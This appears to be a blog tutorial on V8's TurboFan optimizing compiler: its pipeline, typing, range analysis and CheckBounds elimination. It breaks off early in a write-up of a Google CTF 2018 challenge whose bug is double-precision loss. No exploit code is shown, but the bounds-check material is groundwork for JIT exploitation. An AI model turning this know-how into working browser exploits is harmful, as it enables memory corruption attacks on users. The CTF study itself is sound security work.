When you execute a JavaScript file with --trace-turbo (use --trace-turbo-filter to limit it to a specific function), .cfg and .json files are generated so that you can get a graph view of the different optimization passes using Turbolizer.

Simply go to the web interface using your favourite browser (which is Chromium of course) and select the file from the interface.
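
For example (the script and function names below are just placeholders), an invocation like this drops the trace files in the current directory, ready to be loaded in Turbolizer:

$ d8 --trace-turbo --trace-turbo-filter=opt_me yourscript.js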

Compilation pipeline

Let's take the following code.

let f = (o) => {
  var obj = [1,2,3];
  var x = Math.ceil(Math.random());
  return obj[o+x];
}

for (let i = 0; i < 0x10000; ++i) {
 f(i); 
}

We can trace optimizations with --trace-opt and observe that the function f will eventually get optimized by TurboFan as you can see below.

$ d8 pipeline.js  --trace-opt
[marking 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> for optimized recompilation, reason: small function, ICs with typeinfo: 4/4 (100%), generic ICs: 0/4 (0%)]
[marking 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 2/7 (28%)]
[compiling method 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> using TurboFan]
[optimizing 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)> - took 23.583, 25.899, 0.444 ms]
[completed optimizing 0x28645d1801b1 <JSFunction f (sfi = 0x192ee849d9c9)>]
[compiling method 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> using TurboFan OSR]
[optimizing 0x192ee849db41 <JSFunction (sfi = 0x192ee849d991)> - took 18.238, 87.603, 0.874 ms]

We can look at the code object of the function before and after optimization using %DisassembleFunction.

// before
0x17de4c02061: [Code]
 - map: 0x0868f07009d9 <Map>
kind = BUILTIN
name = InterpreterEntryTrampoline
compiler = unknown
address = 0x7ffd9c25d340
// after
0x17de4c82d81: [Code]
 - map: 0x0868f07009d9 <Map>
kind = OPTIMIZED_FUNCTION
stack_slots = 8
compiler = turbofan
address = 0x7ffd9c25d340

What happens is that v8 first generates ignition bytecode. If the function gets executed a lot, TurboFan will generate some optimized code.
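
If you do not want to wait for a warm-up loop, the natives syntax seen earlier lets you request optimization manually; a minimal sketch (run with --allow-natives-syntax):

function f(o) { return o + 1; }
f(1);                           // gather some type feedback first
%OptimizeFunctionOnNextCall(f); // request TurboFan for the next call
f(2);                           // runs the optimized code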

Ignition instructions gather type feedback that will help TurboFan's speculative optimizations. Speculative optimization means that the generated code relies on assumptions.

For instance, if we've got a function move that is always used to move an object of type Player, optimized code generated by TurboFan will expect Player objects and will be very fast for this case.

class Player{}
class Wall{}
function move(o) {
    // ...
}
player = new Player();
move(player)
move(player)
...
// ... optimize code! the move function handles very fast objects of type Player
move(player) 

However, if 10 minutes later, for some reason, you move a Wall instead of a Player, that will break the assumptions originally made by TurboFan. The generated code was very fast, but could only handle Player objects. Therefore, it needs to be destroyed and some ignition bytecode will be generated instead. This is called deoptimization and it has a huge performance cost. If we keep moving both Wall and Player objects, TurboFan will take this into account and optimize the code again accordingly.

Let's observe this behaviour using --trace-opt and --trace-deopt!

class Player{}
class Wall{}

function move(obj) {
  var tmp = obj.x + 42;
  var x = Math.random();
  x += 1;
  return tmp + x;
}

for (var i = 0; i < 0x10000; ++i) {
  move(new Player());
}
move(new Wall());
for (var i = 0; i < 0x10000; ++i) {
  move(new Wall());
}
$ d8 deopt.js  --trace-opt --trace-deopt
[marking 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 0/7 (0%)]
[compiling method 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> using TurboFan]
[optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> - took 23.374, 15.701, 0.379 ms]
[completed optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)>]
// [...]
[deoptimizing (DEOPT eager): begin 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> (opt #0) @1, FP to SP delta: 24, caller sp: 0x7ffcd23cba98]
            ;;; deoptimize at <deopt.js:5:17>, wrong map
// [...]
[deoptimizing (eager): end 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> @1 => node=0, pc=0x7fa245e11e60, caller sp=0x7ffcd23cba98, took 0.755 ms]
[marking 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> for optimized recompilation, reason: small function, ICs with typeinfo: 7/7 (100%), generic ICs: 0/7 (0%)]
[compiling method 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> using TurboFan]
[optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)> - took 11.599, 10.742, 0.573 ms]
[completed optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)>]
// [...]

The log clearly shows that when encountering the Wall object with a different map (read: "type"), it deoptimizes because the code was only meant to deal with Player objects.

If you are interested in learning more about this, I recommend having a look at the following resources: TurboFan Introduction to speculative optimization in v8, v8 behind the scenes, Shape and v8 resources.

Sea of Nodes

Just a few words on sea of nodes. TurboFan works on a program representation called a sea of nodes. Nodes can represent arithmetic operations, loads, stores, calls, constants, etc. There are three types of edges that we describe one by one below.

Control edges

Control edges are the same kind of edges that you find in Control Flow Graphs. They enable branches and loops.

[figure: control edges]

Value edges

Value edges are the edges you find in Data Flow Graphs. They show value dependencies.

[figure: value edges]

Effect edges

Effect edges order operations such as reading or writing states.

In a scenario like obj[x] = obj[x] + 1 you need to read the property x before writing it. As such, there is an effect edge between the load and the store. Also, you need to increment the read property before storing it. Therefore, you need an effect edge between the load and the addition. In the end, the effect chain is load -> add -> store as you can see below.

[figure: effect chain load -> add -> store]

If you would like to learn more about this you may want to check this TechTalk on TurboFan JIT design or this blog post.

Experimenting with the optimization phases

In this article we want to focus on how v8 generates optimized code using TurboFan. As mentioned just before, TurboFan works with a sea of nodes and we want to understand how this graph evolves through all the optimizations. This is particularly interesting to us because some very powerful security bugs have been found in this area. Recent TurboFan vulnerabilities include the incorrect typing of Math.expm1, the incorrect typing of String.(last)IndexOf (which I exploited here), and incorrect operation side-effect modeling.

In order to understand what happens, you really need to read the code. Here are a few places you want to look at in the source folder:

  • src/builtins

    Where all the builtin functions such as Array#concat are implemented

  • src/runtime

    Where all the runtime functions such as %DebugPrint are implemented

  • src/interpreter/interpreter-generator.cc

    Where all the bytecode handlers are implemented

  • src/compiler

    Main repository for TurboFan!

  • src/compiler/pipeline.cc

    The glue that builds the graph, runs every phase and optimization pass, etc.

  • src/compiler/opcodes.h

    Macros that defines all the opcodes used by TurboFan

  • src/compiler/typer.cc

    Implements typing via the Typer reducer

  • src/compiler/operation-typer.cc

    Implements some more typing, used by the Typer reducer

  • src/compiler/simplified-lowering.cc

    Implements simplified lowering, where some CheckBounds elimination will be done

Playing with NumberAdd

Let's consider the following function:

function opt_me() {
  let x = Math.random();
  let y = x + 2;
  return y + 3;
}

Simply execute it a lot to trigger TurboFan or manually force optimization with %OptimizeFunctionOnNextCall. Run your code with --trace-turbo to generate trace files for turbolizer.

Graph builder phase

We can look at the very first generated graph by selecting the "bytecode graph builder" option. The JSCall node corresponds to the Math.random call and obviously the NumberConstant and SpeculativeNumberAdd nodes are generated because of both x+2 and y+3 statements.

[figure: graph after the bytecode graph builder]

Typer phase

After graph creation come the optimization phases, which, as the name implies, run various optimization passes. An optimization pass can be called during several phases.

One of the early optimization phases is called the TyperPhase and is run by OptimizeGraph. The code is pretty self-explanatory.

// pipeline.cc
bool PipelineImpl::OptimizeGraph(Linkage* linkage) {
  PipelineData* data = this->data_;
  // Type the graph and keep the Typer running such that new nodes get
  // automatically typed when they are created.
  Run<TyperPhase>(data->CreateTyper());
// pipeline.cc
struct TyperPhase {
  void Run(PipelineData* data, Zone* temp_zone, Typer* typer) {
    // [...]
    typer->Run(roots, &induction_vars);
  }
};

When the Typer runs, it visits every node of the graph and tries to reduce them.

// typer.cc
void Typer::Run(const NodeVector& roots,
                LoopVariableOptimizer* induction_vars) {
  // [...]
  Visitor visitor(this, induction_vars);
  GraphReducer graph_reducer(zone(), graph());
  graph_reducer.AddReducer(&visitor);
  for (Node* const root : roots) graph_reducer.ReduceNode(root);
  graph_reducer.ReduceGraph();
  // [...]
}

class Typer::Visitor : public Reducer {
// ...
  Reduction Reduce(Node* node) override {
// calls visitors such as JSCallTyper
}
// typer.cc
Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
  if (!fun.IsHeapConstant() || !fun.AsHeapConstant()->Ref().IsJSFunction()) {
    return Type::NonInternal();
  }
  JSFunctionRef function = fun.AsHeapConstant()->Ref().AsJSFunction();
  if (!function.shared().HasBuiltinFunctionId()) {
    return Type::NonInternal();
  }
  switch (function.shared().builtin_function_id()) {
    case BuiltinFunctionId::kMathRandom:
      return Type::PlainNumber();

So basically, the TyperPhase is going to call JSCallTyper on every single JSCall node that it visits. If we read the code of JSCallTyper, we see that whenever the called function is a builtin, it will associate a Type with it. For instance, in the case of a call to the MathRandom builtin, it knows that the expected return type is a Type::PlainNumber.

Type Typer::Visitor::TypeNumberConstant(Node* node) {
  double number = OpParameter<double>(node->op());
  return Type::NewConstant(number, zone());
}
Type Type::NewConstant(double value, Zone* zone) {
  if (RangeType::IsInteger(value)) {
    return Range(value, value, zone);
  } else if (IsMinusZero(value)) {
    return Type::MinusZero();
  } else if (std::isnan(value)) {
    return Type::NaN();
  }

  DCHECK(OtherNumberConstantType::IsOtherNumberConstant(value));
  return OtherNumberConstant(value, zone);
}

For the NumberConstant nodes it's easy: we simply read TypeNumberConstant. In most cases, the type will be a Range. What about those SpeculativeNumberAdd nodes now? We need to look at the OperationTyper.

#define SPECULATIVE_NUMBER_BINOP(Name)                         \
  Type OperationTyper::Speculative##Name(Type lhs, Type rhs) { \
    lhs = SpeculativeToNumber(lhs);                            \
    rhs = SpeculativeToNumber(rhs);                            \
    return Name(lhs, rhs);                                     \
  }
SPECULATIVE_NUMBER_BINOP(NumberAdd)
#undef SPECULATIVE_NUMBER_BINOP

Type OperationTyper::SpeculativeToNumber(Type type) {
  return ToNumber(Type::Intersect(type, Type::NumberOrOddball(), zone()));
}

They end up being reduced by OperationTyper::NumberAdd(Type lhs, Type rhs) (the return Name(lhs,rhs) becomes return NumberAdd(lhs, rhs) after preprocessing).

To get the types of the right and left input nodes, we call SpeculativeToNumber on both of them. To keep it simple, any kind of Type::Number will remain the same type (a PlainNumber being a Number, it will stay a PlainNumber). The Range(n,n) type will become a Number as well, so that we end up calling NumberAdd on two Numbers. NumberAdd mostly checks for corner cases, like one of the two types being a MinusZero for instance. In most cases, the function will simply return the PlainNumber type.

Okay done for the Typer phase!

To sum up, everything happened in:

  • Typer::Visitor::JSCallTyper
  • OperationTyper::SpeculativeNumberAdd

And this is how types are treated:

  • The type of JSCall(MathRandom) becomes a PlainNumber,
  • The type of NumberConstant[n] with n != NaN & n != -0 becomes a Range(n,n),
  • The type of a Range(n,n) is PlainNumber,
  • The type of SpeculativeNumberAdd(PlainNumber, PlainNumber) is PlainNumber.

Now the graph looks like this:

[figure: graph after the typer phase]

Type lowering

In OptimizeGraph, the type lowering comes right after the typing.

// pipeline.cc
  Run<TyperPhase>(data->CreateTyper());
  RunPrintAndVerify(TyperPhase::phase_name());
  Run<TypedLoweringPhase>();
  RunPrintAndVerify(TypedLoweringPhase::phase_name());

This phase goes through even more reducers.

// pipeline.cc
    TypedOptimization typed_optimization(&graph_reducer, data->dependencies(),
                                         data->jsgraph(), data->broker());
// [...]
    AddReducer(data, &graph_reducer, &dead_code_elimination);
    AddReducer(data, &graph_reducer, &create_lowering);
    AddReducer(data, &graph_reducer, &constant_folding_reducer);
    AddReducer(data, &graph_reducer, &typed_lowering);
    AddReducer(data, &graph_reducer, &typed_optimization);
    AddReducer(data, &graph_reducer, &simple_reducer);
    AddReducer(data, &graph_reducer, &checkpoint_elimination);
    AddReducer(data, &graph_reducer, &common_reducer);

Let's have a look at the TypedOptimization and more specifically TypedOptimization::Reduce.

When a node is visited and its opcode is IrOpcode::kSpeculativeNumberAdd, it calls ReduceSpeculativeNumberAdd.

Reduction TypedOptimization::ReduceSpeculativeNumberAdd(Node* node) {
  Node* const lhs = NodeProperties::GetValueInput(node, 0);
  Node* const rhs = NodeProperties::GetValueInput(node, 1);
  Type const lhs_type = NodeProperties::GetType(lhs);
  Type const rhs_type = NodeProperties::GetType(rhs);
  NumberOperationHint hint = NumberOperationHintOf(node->op());
  if ((hint == NumberOperationHint::kNumber ||
       hint == NumberOperationHint::kNumberOrOddball) &&
      BothAre(lhs_type, rhs_type, Type::PlainPrimitive()) &&
      NeitherCanBe(lhs_type, rhs_type, Type::StringOrReceiver())) {
    // SpeculativeNumberAdd(x:-string, y:-string) =>
    //     NumberAdd(ToNumber(x), ToNumber(y))
    Node* const toNum_lhs = ConvertPlainPrimitiveToNumber(lhs);
    Node* const toNum_rhs = ConvertPlainPrimitiveToNumber(rhs);
    Node* const value =
        graph()->NewNode(simplified()->NumberAdd(), toNum_lhs, toNum_rhs);
    ReplaceWithValue(node, value);
    return Replace(node);
  }
  return NoChange();
}

In the case of our two nodes, both have a hint of NumberOperationHint::kNumber because their type is a PlainNumber.

Both the right and left hand side types are PlainPrimitive (PlainNumber from the NumberConstant's Range and PlainNumber from the JSCall). Therefore, a new NumberAdd node is created and replaces the SpeculativeNumberAdd.

Similarly, JSTypedLowering::ReduceJSCall is called when the JSTypedLowering reducer visits a JSCall node. Because the call target is a Code Stub Assembler implementation of a builtin function, TurboFan simply creates a LoadField node and changes the opcode of the JSCall node to a Call opcode.

It also adds new inputs to this node.

Reduction JSTypedLowering::ReduceJSCall(Node* node) {
// [...]
// Check if {target} is a known JSFunction.
// [...]
    // Load the context from the {target}.
    Node* context = effect = graph()->NewNode(
        simplified()->LoadField(AccessBuilder::ForJSFunctionContext()), target,
        effect, control);
    NodeProperties::ReplaceContextInput(node, context);

    // Update the effect dependency for the {node}.
    NodeProperties::ReplaceEffectInput(node, effect);
// [...]
// kMathRandom is a CSA builtin, not a CPP one
// builtins-math-gen.cc:TF_BUILTIN(MathRandom, CodeStubAssembler) 
// builtins-definitions.h:  TFJ(MathRandom, 0, kReceiver)  
    } else if (shared.HasBuiltinId() &&
               Builtins::HasCppImplementation(shared.builtin_id())) {
      // Patch {node} to a direct CEntry call.
      ReduceBuiltin(jsgraph(), node, shared.builtin_id(), arity, flags);
    } else if (shared.HasBuiltinId() &&
               Builtins::KindOf(shared.builtin_id()) == Builtins::TFJ) {
      // Patch {node} to a direct code object call.
      Callable callable = Builtins::CallableFor(
          isolate(), static_cast<Builtins::Name>(shared.builtin_id()));
      CallDescriptor::Flags flags = CallDescriptor::kNeedsFrameState;

      const CallInterfaceDescriptor& descriptor = callable.descriptor();
      auto call_descriptor = Linkage::GetStubCallDescriptor(
          graph()->zone(), descriptor, 1 + arity, flags);
      Node* stub_code = jsgraph()->HeapConstant(callable.code());
      node->InsertInput(graph()->zone(), 0, stub_code);  // Code object.
      node->InsertInput(graph()->zone(), 2, new_target);
      node->InsertInput(graph()->zone(), 3, argument_count);
      NodeProperties::ChangeOp(node, common()->Call(call_descriptor));
    }
 // [...]
    return Changed(node);
  }

Let's quickly check the sea of nodes to observe the addition of the LoadField and the opcode change of node #25 (note that it is the same node as before, only the opcode changed).

[figure: LoadField added and JSCall node #25 changed to Call]

Range types

Previously, we encountered various types, including the Range type. However, these were always Range(n,n) ranges of size 1.

Now let's consider the following code:

function opt_me(b) {
  let x = 10; // [1] x0 = 10
  if (b == "foo")
    x = 5; // [2] x1 = 5
  // [3] x2 = phi(x0, x1)
  let y = x + 2;
  y = y + 1000; 
  y = y * 2;
  return y;
}

So depending on b == "foo" being true or false, x will be either 10 or 5. In SSA form, each variable can be assigned only once, so x0 and x1 will be created for 10 and 5 at lines [1] and [2]. At line [3], the value of x (x2 in SSA) will be either x0 or x1, hence the need for a phi function. The statement x2 = phi(x0,x1) means that x2 can take the value of either x0 or x1.

So what about types now? The type of the constant 10 (x0) is Range(10,10) and the type of the constant 5 (x1) is Range(5,5). Without surprise, the type of the phi node is the union of the two ranges, which is Range(5,10).

Let's quickly draw a CFG graph in SSA form with typing.

[figure: CFG in SSA form with types]

Okay, let's actually check this by reading the code.

Type Typer::Visitor::TypePhi(Node* node) {
  int arity = node->op()->ValueInputCount();
  Type type = Operand(node, 0);
  for (int i = 1; i < arity; ++i) {
    type = Type::Union(type, Operand(node, i), zone());
  }
  return type;
}

The code looks exactly as we would expect it to be: simply the union of all of the input types!

To understand the typing of the SpeculativeSafeIntegerAdd nodes, we need to go back to the OperationTyper implementation. In the case of SpeculativeSafeIntegerAdd(n,m), TurboFan does an AddRanger(n.Min(), n.Max(), m.Min(), m.Max()).

Type OperationTyper::SpeculativeSafeIntegerAdd(Type lhs, Type rhs) {
  Type result = SpeculativeNumberAdd(lhs, rhs);
  // If we have a Smi or Int32 feedback, the representation selection will
  // either truncate or it will check the inputs (i.e., deopt if not int32).
  // In either case the result will be in the safe integer range, so we
  // can bake in the type here. This needs to be in sync with
  // SimplifiedLowering::VisitSpeculativeAdditiveOp.
  return Type::Intersect(result, cache_->kSafeIntegerOrMinusZero, zone());
}
Type OperationTyper::NumberAdd(Type lhs, Type rhs) {
// [...]
  Type type = Type::None();
  lhs = Type::Intersect(lhs, Type::PlainNumber(), zone());
  rhs = Type::Intersect(rhs, Type::PlainNumber(), zone());
  if (!lhs.IsNone() && !rhs.IsNone()) {
    if (lhs.Is(cache_->kInteger) && rhs.Is(cache_->kInteger)) {
      type = AddRanger(lhs.Min(), lhs.Max(), rhs.Min(), rhs.Max());
    } 
// [...]
  return type;
}

AddRanger is the function that actually computes the min and max bounds of the Range.

Type OperationTyper::AddRanger(double lhs_min, double lhs_max, double rhs_min,
                               double rhs_max) {
  double results[4];
  results[0] = lhs_min + rhs_min;
  results[1] = lhs_min + rhs_max;
  results[2] = lhs_max + rhs_min;
  results[3] = lhs_max + rhs_max;
  // Since none of the inputs can be -0, the result cannot be -0 either.
  // However, it can be nan (the sum of two infinities of opposite sign).
  // On the other hand, if none of the "results" above is nan, then the
  // actual result cannot be nan either.
  int nans = 0;
  for (int i = 0; i < 4; ++i) {
    if (std::isnan(results[i])) ++nans;
  }
  if (nans == 4) return Type::NaN();
  Type type = Type::Range(array_min(results, 4), array_max(results, 4), zone());
  if (nans > 0) type = Type::Union(type, Type::NaN(), zone());
  // Examples:
  //   [-inf, -inf] + [+inf, +inf] = NaN
  //   [-inf, -inf] + [n, +inf] = [-inf, -inf] \/ NaN
  //   [-inf, +inf] + [n, +inf] = [-inf, +inf] \/ NaN
  //   [-inf, m] + [n, +inf] = [-inf, +inf] \/ NaN
  return type;
}

Done with the range analysis!

[figure: graph with the computed Range types]

CheckBounds nodes

Our final experiment deals with CheckBounds nodes. Basically, nodes with a CheckBounds opcode add bound checks before loads and stores.

Consider the following code:

function opt_me(b) {
  let values = [42,1337];       // HeapConstant <FixedArray[2]>
  let x = 10;                   // NumberConstant[10]          | Range(10,10)
  if (b == "foo")
    x = 5;                      // NumberConstant[5]           | Range(5,5)
                                // Phi                         | Range(5,10)
  let y = x + 2;                // SpeculativeSafeIntegerAdd   | Range(7,12)
  y = y + 1000;                 // SpeculativeSafeIntegerAdd   | Range(1007,1012)
  y = y * 2;                    // SpeculativeNumberMultiply   | Range(2014,2024)
  y = y & 10;                   // SpeculativeNumberBitwiseAnd | Range(0,10)
  y = y / 3;                    // SpeculativeNumberDivide     | PlainNumber[r][s][t]
  y = y & 1;                    // SpeculativeNumberBitwiseAnd | Range(0,1)
  return values[y];             // CheckBounds                 | Range(0,1)
}

In order to prevent values[y] from using an out of bounds index, a CheckBounds node is generated. Here is what the sea of nodes graph looks like right after the escape analysis phase.

[figure: graph right after the escape analysis phase, CheckBounds present]

The cautious reader probably noticed something interesting about the range analysis: the type of the CheckBounds node is Range(0,1)! Also, the LoadElement has an input FixedArray HeapConstant of length 2. That leads us to an interesting phase: the simplified lowering.

Simplified lowering

When visiting a node with an IrOpcode::kCheckBounds opcode, the function VisitCheckBounds is going to get called.

And this function is responsible for CheckBounds elimination, which sounds interesting!

Long story short, it compares input 0 (the index) against input 1 (the length). If the index's minimum range value is greater than or equal to zero, and its maximum range value is less than the length's minimum range value, it triggers a DeferReplacement, which means that the CheckBounds node will eventually be removed!

 void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) {
    CheckParameters const& p = CheckParametersOf(node->op());
    Type const index_type = TypeOf(node->InputAt(0));
    Type const length_type = TypeOf(node->InputAt(1));
    if (length_type.Is(Type::Unsigned31())) {
      if (index_type.Is(Type::Integral32OrMinusZero())) {
        // Map -0 to 0, and the values in the [-2^31,-1] range to the
        // [2^31,2^32-1] range, which will be considered out-of-bounds
        // as well, because the {length_type} is limited to Unsigned31.
        VisitBinop(node, UseInfo::TruncatingWord32(),
                   MachineRepresentation::kWord32);
        if (lower()) {
          if (lowering->poisoning_level_ ==
                  PoisoningMitigationLevel::kDontPoison &&
              (index_type.IsNone() || length_type.IsNone() ||
               (index_type.Min() >= 0.0 &&
                index_type.Max() < length_type.Min()))) {
            // The bounds check is redundant if we already know that
            // the index is within the bounds of [0.0, length[.
            DeferReplacement(node, node->InputAt(0));
          } else {
            NodeProperties::ChangeOp(
                node, simplified()->CheckedUint32Bounds(p.feedback()));
          }
        }
// [...]
  }

Once again, let's confirm that by playing with the graph. We want to look at the CheckBounds before the simplified lowering and observe its inputs.

[figure: the CheckBounds node with its index (Range(0,1)) and length (FixedArray of length 2) inputs]

We can easily see that Range(0,1).Max() < 2 and Range(0,1).Min() >= 0. Therefore, node 58 is deemed redundant by the analysis and is going to be replaced by its index input.

After simplified lowering, the graph looks like this :

[figure: graph after simplified lowering, with the CheckBounds node removed]

Playing with various addition opcodes

If you look at the file opcodes.h, you can see various types of opcodes that correspond to some kind of add primitive.

V(JSAdd)
V(NumberAdd)
V(SpeculativeNumberAdd)
V(SpeculativeSafeIntegerAdd)
V(Int32Add)
// many more [...]

So, without going into too much detail, we're going to do one more experiment. Let's write small snippets of code that generate each one of these opcodes. For each one, we want to confirm we've got the expected opcode in the sea of nodes.

SpeculativeSafeIntegerAdd

let opt_me = (x) => {
  return x + 1;
}

for (var i = 0; i < 0x10000; ++i)
  opt_me(i);
%DebugPrint(opt_me);
%SystemBreak();

In this case, TurboFan speculates that x will be an integer. This guess is made due to the type feedback we mentioned earlier.

Indeed, before TurboFan kicks in, v8 first quickly generates ignition bytecode that gathers type feedback.

$ d8 speculative_safeintegeradd.js --allow-natives-syntax --print-bytecode --print-bytecode-filter opt_me
[generated bytecode for function: opt_me]
Parameter count 2
Frame size 0
   13 E> 0xceb2389dc72 @    0 : a5                StackCheck 
   24 S> 0xceb2389dc73 @    1 : 25 02             Ldar a0
   33 E> 0xceb2389dc75 @    3 : 40 01 00          AddSmi [1], [0]
   37 S> 0xceb2389dc78 @    6 : a9                Return 
Constant pool (size = 0)
Handler Table (size = 0)

The x + 1 statement is represented by the AddSmi ignition opcode.

If you want to know more, Franziska Hinkelmann wrote a blog post about ignition bytecode.

Let's read the code to quickly understand the semantics.

// Adds an immediate value <imm> to the value in the accumulator.
IGNITION_HANDLER(AddSmi, InterpreterBinaryOpAssembler) {
  BinaryOpSmiWithFeedback(&BinaryOpAssembler::Generate_AddWithFeedback);
}

This code means that every time this ignition opcode is executed, it will gather type feedback to enable TurboFan's speculative optimizations.

We can examine the type feedback vector (which is the structure containing the profiling data) of a function by using %DebugPrint or the job gdb command on a tagged pointer to a FeedbackVector.

DebugPrint: 0x129ab460af59: [Function]
// [...]
 - feedback vector: 0x1a5d13f1dd91: [FeedbackVector] in OldSpace
// [...]
gef➤  job 0x1a5d13f1dd91
0x1a5d13f1dd91: [FeedbackVector] in OldSpace
// ...
 - slot #0 BinaryOp BinaryOp:SignedSmall { // actual type feedback
     [0]: 1
  }

Thanks to this profiling, TurboFan knows it can generate a SpeculativeSafeIntegerAdd. This is exactly the reason why it is called speculative optimization (TurboFan makes guesses, assumptions, based on this profiling). However, once optimized, if opt_me is called with a completely different parameter type, there would be a deoptimization.

[figure: graph with the SpeculativeSafeIntegerAdd node]
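
As a quick aside, you can observe that deoptimization yourself with d8's --trace-deopt flag (a standard V8 flag); the exact log text varies across versions, so treat this as a sketch:

// run with: d8 speculative_safeintegeradd.js --allow-natives-syntax --trace-deopt
opt_me("clearly not a Smi"); // the SignedSmall assumption no longer holds => deoptimization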

SpeculativeNumberAdd

let opt_me = (x) => {
  return x + 1000000000000;
}
opt_me(42);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(4242);

If we modify the previous code snippet a bit and use a larger value that can't be represented by a small integer (Smi), we'll get a SpeculativeNumberAdd instead. TurboFan still speculates about the type of x, relying on type feedback.

[figure: graph with the SpeculativeNumberAdd node]

Int32Add

let opt_me = (x) => {
  let y = x ? 10 : 20;
  return y + 100;
}
opt_me(true);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(false);

At first, the addition y + 100 relies on speculation, hence the SpeculativeSafeIntegerAdd opcode. However, during the simplified lowering phase, TurboFan understands that y + 100 is always going to be an addition between two small 32-bit integers, and lowers the node to an Int32Add.

  • Before: [figure: graph with the SpeculativeSafeIntegerAdd node]

  • After: [figure: graph with the lowered Int32Add node]

JSAdd

let opt_me = (x) => {
  let y = x ? 
    ({valueOf() { return 10; }})
    :
    ({[Symbol.toPrimitive]() { return 20; }});
  return y + 1;
}

opt_me(true);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(false);

In this case, y is a complex object and we need to call a slow JSAdd opcode to deal with this kind of situation.

[figure: graph with the JSAdd node]

NumberAdd

let opt_me = (x) => {
  let y = x ? 10 : 20;
  return y + 1000000000000;
}

opt_me(true);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(false);

As in the SpeculativeNumberAdd example, we add a value that can't be represented by a small integer. However, this time there is no speculation involved: no type feedback is needed, since y is guaranteed to be an integer and there is no way to make it anything else.

[figure: graph with the NumberAdd node]

The DuplicateAdditionReducer challenge

The DuplicateAdditionReducer written by Stephen Röttger for Google CTF 2018 is a nice TurboFan challenge that adds a new reducer optimizing cases like x + 1 + 1.

Understanding the reduction

Let’s read the relevant part of the code.

Reduction DuplicateAdditionReducer::Reduce(Node* node) {
  switch (node->opcode()) {
    case IrOpcode::kNumberAdd:
      return ReduceAddition(node);
    default:
      return NoChange();
  }
}

Reduction DuplicateAdditionReducer::ReduceAddition(Node* node) {
  DCHECK_EQ(node->op()->ControlInputCount(), 0);
  DCHECK_EQ(node->op()->EffectInputCount(), 0);
  DCHECK_EQ(node->op()->ValueInputCount(), 2);

  Node* left = NodeProperties::GetValueInput(node, 0);
  if (left->opcode() != node->opcode()) {
    return NoChange(); // [1]
  }

  Node* right = NodeProperties::GetValueInput(node, 1);
  if (right->opcode() != IrOpcode::kNumberConstant) {
    return NoChange(); // [2]
  }

  Node* parent_left = NodeProperties::GetValueInput(left, 0);
  Node* parent_right = NodeProperties::GetValueInput(left, 1);
  if (parent_right->opcode() != IrOpcode::kNumberConstant) {
    return NoChange(); // [3]
  }

  double const1 = OpParameter<double>(right->op());
  double const2 = OpParameter<double>(parent_right->op());

  Node* new_const = graph()->NewNode(common()->NumberConstant(const1+const2));

  NodeProperties::ReplaceValueInput(node, parent_left, 0);
  NodeProperties::ReplaceValueInput(node, new_const, 1);
  return Changed(node); // [4]
}

Basically, that means we've got 4 different code paths (see the code comments) when reducing a NumberAdd node, and only one of them leads to a node change. Let's draw a schema representing all of those cases; nodes in red indicate a condition that isn't satisfied, leading to a return NoChange.

[figure: schema of the four ReduceAddition code paths; only case [4] changes the node]

Case [4] takes both NumberConstants' double values and adds them together. It creates a new NumberConstant node whose value is the result of this addition.

The node's right input becomes the newly created NumberConstant, while its left input is replaced by the left parent's own left input.

[figure: NumberAdd(NumberAdd(x, c2), c1) rewritten into NumberAdd(x, c1 + c2)]

Understanding the bug

Precision loss with IEEE-754 doubles

V8 represents numbers using IEEE-754 doubles. A double's 52-bit mantissa, together with its implicit leading bit, can encode every integer up to 53 bits. Therefore the maximum safely-representable integer is pow(2,53)-1, which is 9007199254740991.

Numbers above this value can't all be represented, so there will be precision loss when computing with values greater than that.

[figure: IEEE-754 double-precision layout: 1-bit sign, 11-bit exponent, 52-bit mantissa]

A quick experiment in JavaScript demonstrates the problem and the strange behaviors it leads to.

d8> var x = Number.MAX_SAFE_INTEGER + 1
undefined
d8> x
9007199254740992
d8> x + 1
9007199254740992
d8> 9007199254740993 == 9007199254740992
true
d8> x + 2
9007199254740994
d8> x + 3
9007199254740996
d8> x + 4 
9007199254740996
d8> x + 5
9007199254740996
d8> x + 6
9007199254740998

Let's try to better understand this. 64-bit IEEE-754 doubles are represented using a 1-bit sign, an 11-bit exponent and a 52-bit mantissa. When using the normalized form (non-zero exponent), the value is computed with the following formula.

value = (-1)^sign * 2^e * fraction
e = exponent - bias
bias = 1023 (for 64-bit doubles)
fraction = 1 + bit51*2^-1 + bit50*2^-2 + ... + bit0*2^-52

So let's go through a few computations ourselves.

d8> %DumpObjects(Number.MAX_SAFE_INTEGER, 10)
----- [ HEAP_NUMBER_TYPE : 0x10 ] -----
0x00000b8fffc0ddd0    0x00001f5c50100559    MAP_TYPE    
0x00000b8fffc0ddd8    0x433fffffffffffff    

d8> %DumpObjects(Number.MAX_SAFE_INTEGER + 1, 10)
----- [ HEAP_NUMBER_TYPE : 0x10 ] -----
0x00000b8fffc0aec0    0x00001f5c50100559    MAP_TYPE    
0x00000b8fffc0aec8    0x4340000000000000    

